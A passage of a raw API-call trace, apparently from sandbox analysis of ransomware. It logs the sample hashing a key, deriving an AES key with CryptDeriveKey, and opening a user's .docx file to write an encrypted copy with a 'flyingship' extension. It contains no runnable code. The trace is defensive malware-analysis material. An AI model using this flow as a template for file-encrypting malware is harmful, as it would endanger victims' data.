| out: lpMsg=0x87f5c4) returned 0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.656] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.656] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0168.657] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0x90add8 [0168.657] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.657] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0x90add8 [0168.657] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MFkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FkGR.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.659] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.659] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0x90af58 [0168.677] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.677] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.677] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0168.678] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0168.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.679] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.679] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.679] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.680] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.680] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.680] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.680] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0168.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.680] CryptDestroyHash (hHash=0x90ae18) returned 1 [0168.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0-mfkgr.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.681] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.681] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.681] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.681] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.681] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.682] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0-mfkgr.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0168.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.685] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.685] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0xf77d, lpOverlapped=0x0) returned 1 [0168.689] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 